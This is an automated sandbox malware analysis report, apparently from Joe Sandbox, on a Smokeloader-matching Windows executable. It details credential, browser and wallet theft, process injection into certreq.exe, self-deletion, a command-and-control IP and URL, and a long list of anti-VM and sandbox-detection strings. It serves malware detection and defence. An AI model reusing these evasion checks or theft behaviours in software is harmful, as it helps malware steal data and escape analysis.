Edit tour

Windows Analysis Report
09212399.exe

Overview

General Information

Sample Name:	09212399.exe
Analysis ID:	877002
MD5:	57dd320eae0fadd155619407c8b5313c
SHA1:	fc2ce4b86d64025dbba19bb84e561a27fcb6ffb3
SHA256:	4a524e63c81e6cf9ab8a86f8de0973ea6a6d0973545867d34eba1b777e238628
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected AntiVM3

Detected unpacking (changes PE section rights)

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Tries to harvest and steal Bitcoin Wallet information

Deletes itself after installation

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

09212399.exe (PID: 4968 cmdline: C:\Users\user\Desktop\09212399.exe MD5: 57DD320EAE0FADD155619407C8B5313C)

certreq.exe (PID: 7032 cmdline: C:\Windows\system32\certreq.exe MD5: 5A4F8BBCD943BC543B3F664C7DA83827)

conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WerFault.exe (PID: 3332 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 880 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.364029125.0000000002632000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: 09212399.exe PID: 4968	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 09212399.exe

Virustotal: Detection: 40%

Perma Link

Machine Learning detection for sample

Source: 09212399.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\09212399.exe

Unpacked PE file: 0.2.09212399.exe.400000.0.unpack

Source: 09212399.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\09212399.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\yufub\meliciz\bodowuh larilu.pdb source: 09212399.exe
Source:	Binary string: ,C:\yufub\meliciz\bodowuh larilu.pdb source: 09212399.exe

Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.3:49699 -> 179.43.162.23:8509

Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23
Source: unknown	TCP traffic detected without corresponding DNS query: 179.43.162.23

Source: 09212399.exe, 00000000.00000002.381262694.00000000000A1000.00000004.00000010.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.368127426.0000000002635000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://179.43.162.23:8509/c29db42cd4cdbbd4077/favicon.png
Source: 09212399.exe, 00000000.00000002.381262694.00000000000A1000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://179.43.162.23:8509/c29db42cd4cdbbd4077/favicon.pngH
Source: 09212399.exe, 00000000.00000003.368127426.0000000002635000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://179.43.162.23:8509/c29db42cd4cdbbd4077/favicon.pngkernelbasentdllkernel32GetProcessMitigatio
Source: certreq.exe, 00000001.00000003.426281539.0000018823E92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: certreq.exe, 00000001.00000003.426281539.0000018823E92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com
Source: certreq.exe, 00000001.00000003.450923361.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.444650267.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.423142442.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.443304465.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.445666271.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.424137500.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.443537430.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.428558621.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.420232422.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.443833228.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.424761572.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.423901851.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.423640005.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.441677024.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.438459075.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.415743888.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.424370962.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.415743888.0000018823DB1000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.419657256.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.444175695.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.426281539.0000018823E92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-AgentAccept-Encodinggzip
Source: certreq.exe, 00000001.00000003.413436249.0000018823DBA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.415230877.0000018823DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://http:///etc/puk.keyMachineGuid

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: 09212399.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\09212399.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 880

Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_3_02716E4B	0_3_02716E4B
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_00416214	0_2_00416214
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_004182F4	0_2_004182F4
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_023E707B	0_2_023E707B
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_023E915B	0_2_023E915B
Source: C:\Windows\System32\certreq.exe	Code function: 1_3_00000188240D4A10	1_3_00000188240D4A10
Source: C:\Windows\System32\certreq.exe	Code function: 1_3_00000188240D2792	1_3_00000188240D2792
Source: C:\Windows\System32\certreq.exe	Code function: 1_3_00000188240D1B9C	1_3_00000188240D1B9C
Source: C:\Windows\System32\certreq.exe	Code function: 1_3_00000188240D2C32	1_3_00000188240D2C32
Source: C:\Windows\System32\certreq.exe	Code function: 1_3_00000188240D5E54	1_3_00000188240D5E54
Source: C:\Windows\System32\certreq.exe	Code function: 1_3_00000188240D5554	1_3_00000188240D5554
Source: C:\Windows\System32\certreq.exe	Code function: 1_3_00000188240D58D4	1_3_00000188240D58D4
Source: C:\Windows\System32\certreq.exe	Code function: 1_3_00000188240D24ED	1_3_00000188240D24ED

Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_0040203B NtProtectVirtualMemory,	0_2_0040203B
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_004018FB GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,NtQuerySystemInformation,HeapAlloc,RtlAllocateHeap,NtQuerySystemInformation,HeapAlloc,WideCharToMultiByte,_strlen,OutputDebugStringW,HeapFree,_rand,_rand,HeapAlloc,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,CreateFileW,ReadFile,CloseHandle,HeapFree,	0_2_004018FB
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_0040250D HeapCreate,VirtualQuery,GetModuleHandleW,OutputDebugStringA,HeapAlloc,GetModuleHandleA,HeapAlloc,HeapAlloc,WaitForSingleObject,HeapFree,RtlFreeHeap,HeapDestroy,NtProtectVirtualMemory,VirtualFree,GetProcessHeap,HeapFree,	0_2_0040250D
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_0040159B GetCurrentProcess,VirtualAllocExNuma,NtAllocateVirtualMemory,HeapAlloc,InterlockedIncrement,InterlockedIncrement,HeapAlloc,InterlockedIncrement,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapAlloc,	0_2_0040159B
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_023D3374 HeapCreate,VirtualQuery,GetModuleHandleW,OutputDebugStringA,WaitForSingleObject,HeapFree,HeapFree,HeapDestroy,NtContinue,NtContinue,NtContinue,GetProcessHeap,HeapFree,	0_2_023D3374
Source: C:\Windows\System32\certreq.exe	Code function: 1_3_00000188240D30A7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,	1_3_00000188240D30A7

Source: 09212399.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 09212399.exe

Virustotal: Detection: 40%

Source: 09212399.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\09212399.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\09212399.exe C:\Users\user\Desktop\09212399.exe
Source: C:\Users\user\Desktop\09212399.exe	Process created: C:\Windows\System32\certreq.exe C:\Windows\system32\certreq.exe
Source: C:\Windows\System32\certreq.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\09212399.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 880
Source: C:\Users\user\Desktop\09212399.exe	Process created: C:\Windows\System32\certreq.exe C:\Windows\system32\certreq.exe	Jump to behavior

Source: C:\Users\user\Desktop\09212399.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\09212399.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\09212399.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@5/0@0/1

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
Source: C:\Users\user\Desktop\09212399.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}

Source: 09212399.exe	String found in binary or memory: {d764e42e-add5-9d16-74e7-6164935016d1}
Source: 09212399.exe	String found in binary or memory: {a722ed69-f75e-adda-c282-357b7a5881c0}
Source: 09212399.exe	String found in binary or memory: {2a53b0ee-add5-8019-6f4d-b504148f277d}
Source: 09212399.exe	String found in binary or memory: {fd1f761c-addd-f638-ccfc-dc2ddad2eb2e}
Source: 09212399.exe	String found in binary or memory: {93c09873-6c92-83d1-add1-d1cf6ce0db24}
Source: 09212399.exe	String found in binary or memory: {67db7274-addc-33aa-369d-f51ff4fbdf01}
Source: 09212399.exe	String found in binary or memory: {652d3a0a-0179-af7e-c9e4-add04bde0b9b}
Source: 09212399.exe	String found in binary or memory: {04e8de6c-add6-baab-c21e-7d664f7ae35c}
Source: 09212399.exe	String found in binary or memory: {e530ebc8-addd-aec2-555f-9c575215134d}
Source: 09212399.exe	String found in binary or memory: {64f34c59-9151-4877-321d-add8d2d439f6}

Source: C:\Windows\System32\certreq.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook

Jump to behavior

Source: C:\Users\user\Desktop\09212399.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 09212399.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 09212399.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 09212399.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 09212399.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 09212399.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 09212399.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 09212399.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\yufub\meliciz\bodowuh larilu.pdb source: 09212399.exe
Source:	Binary string: ,C:\yufub\meliciz\bodowuh larilu.pdb source: 09212399.exe

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\09212399.exe

Unpacked PE file: 0.2.09212399.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\09212399.exe

Unpacked PE file: 0.2.09212399.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_3_0271434F push esp; retf	0_3_0271459C
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_3_02717F4F push ecx; retf	0_3_02717FB0
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_3_02710FF2 push edx; iretd	0_3_0271109E
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_3_02714DED pushad ; retf	0_3_02714DF7
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_3_027106EC push edi; retf	0_3_027106ED
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_3_027149B2 push es; iretd	0_3_027149B3
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_3_02714D8D push es; retf	0_3_02714D8E
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_00416203 push ecx; ret	0_2_00416213
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_00416320 push eax; ret	0_2_00416334
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_00416320 push eax; ret	0_2_0041635C
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_023E706A push ecx; ret	0_2_023E707A
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_023E7187 push eax; ret	0_2_023E719B
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_023E7187 push eax; ret	0_2_023E71C3

Source: C:\Users\user\Desktop\09212399.exe

Code function: 0_2_004179F7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004179F7

Source: initial sample

Static PE information: section name: .text entropy: 7.890261806957562

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\certreq.exe

File deleted: c:\users\user\desktop\09212399.exe

Jump to behavior

Source: C:\Users\user\Desktop\09212399.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\09212399.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\certreq.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\certreq.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000003.364029125.0000000002632000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 09212399.exe PID: 4968, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: 09212399.exe, 00000000.00000003.364029125.0000000002632000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WQLRANDOMRANDOM NAME%THISISANINVALIDFILENAME?[]<>@\;!-{}#:/~%%THISISANINVALIDENVIRONMENTVARIABLENAME?[]<>@\;!-{}#:/~%CMDVRT32.DLLCMDVRT64.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLDBGHELP.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLLTESTAPP.EXEMYAPP.EXEKLAVME.EXETEST.EXEMALWARE.EXESANDBOX.EXEBOT.EXESAMPLE.EXEJOHN DOEVIRUSTEST USERMALTESTMALWARESAND BOXUSERTIMMYPETER WILSONMILOZSMILLERJOHNSONIT-ADMINHONG LEEHAPUBWSEMILYSANDBOXCURRENTUSERTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PCHAL9TH7SILVIAXPAMAST-SCSANDBOXWILBERT-SCCWSXXXXX-OXNMSDBOXCUCKOOCOMPUTERNAMEANDYANONYMOUSUSERC:\A\FOOBAR.GIFC:\A\FOOBAR.DOCC:\A\FOOBAR.BMPC:\123\EMAIL.DOCXC:\123\EMAIL.DOCC:\EMAIL.HTMC:\EMAIL.DOCC:\LOADDLL.EXEC:\TAKE_SCREENSHOT.PS1JOHNKLONE_X64-PCSYSTEMITADMINSWSCWILBERNUMBEROFCORESSELECT * FROM WIN32_PROCESSORROOT\CIMV2VIRTUALQEMUVMWAREVBOXVBOXVBOXVBOXPARALLELS HVPRL HYPERV XENVMMXENVMMVMWAREVMWAREMICROSOFT HVKVMKVMKVMA M IVIRTUALXEN0PARALLELSVMWARESERIALNUMBERSELECT * FROM WIN32_BIOSHVM DOMUVIRTUALBOXMODELSELECT * FROM WIN32_COMPUTERSYSTEMQEMUINNOTEK GMBHMANUFACTURERPROCESSORIDVMWXENVIRTIOSYSTEM\CURRENTCONTROLSET\ENUM\SCSISYSTEM\CURRENTCONTROLSET\ENUM\IDESELECT * FROM CIM_PHYSICALCONNECTOR06/23/99SYSTEMBIOSDATEVIRTUALBOXVIDEOBIOSVERSIONSYSTEMBIOSVERSIONIDENTIFIERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 0\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DESCRIPTION\SYSTEMVBOXSYSTEM\CONTROLSET001\SERVICES\VBOXVIDEOSYSTEM\CONTROLSET001\SERVICES\VBOXSFSYSTEM\CONTROLSET001\SERVICES\VBOXSERVICESYSTEM\CONTROLSET001\SERVICES\VBOXMOUSESYSTEM\CONTROLSET001\SERVICES\VBOXGUESTSOFTWARE\ORACLE\VIRTUALBOX GUEST ADDITIONSHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__SYSTEM32\VBOXCONTROL.EXESYSTEM32\VBOXTRAY.EXESYSTEM32\VBOXSERVICE.EXESYSTEM32\VBOXOGLPASSTHROUGHSPU.DLLSYSTEM32\VBOXOGLPACKSPU.DLLSYSTEM32\VBOXOGLFEEDBACKSPU.DLLSYSTEM32\VBOXOGLERRORSPU.DLLSYSTEM32\VBOXOGLCRUTIL.DLLSYSTEM32\VBOXOGLARRAYSPU.DLLSYSTEM32\VBOXOGL.DLLSYSTEM32\VBOXMRXNP.DLLSYSTEM32\VBOXHOOK.DLLSYSTEM32\VBOXDISP.DLLSYSTEM32\DRIVERS\VBOXVIDEO.SYSSYSTEM32\DRIVERS\VBOXSF.SYSSYSTEM32\DRIVERS\VBOXGUEST.SYSSYSTEM32\DRIVERS\VBOXMOUSE.SYS%PROGRAMW6432%\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPC\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\VBOXMINIRDRDNVBOXTRAYTOOLWNDVBOXTRAYTOOLWNDCLASSVIRTUALBOX SHARED FOLDERSVBOXTRAY.EXEVBOXSERVICE.EXEPCI\VEN_80EE&DEV_CAFEDEVICEIDSELECT * FROM WIN32_PNPENTITYOPENHCD82371SB82441FX82801FBNAMEVEN_VBOXPNPDEVICEIDCAPTIONSELECT * FROM WIN32_PNPDEVICEPNP_BUS_0PCI_BUS_0ACPIBUS_BUS_0SELECT * FROM WIN32_BUSORACLE CORPORATIONPRODUCTSELECT * FROM WIN32_BASEBOARDSOURCESSYSTEMFILENAMESELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMVBOXVIDEOW8VBOXVIDEOVBOXVBOXVIRTUALBOXSYSTEMPRODUCTNAMESYSTEMMANUFACTURERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 2\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DEVICEMAP\SCSI\SCSI PORT 1\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0SYSTEM\CONTROLSET001\CONTROL\SYSTEMINFORMATIONVMWARESOFTWARE\VMWARE, INC.\VMWARE TOOLSVMACTHLP.EXEVGAUTHSERVICE
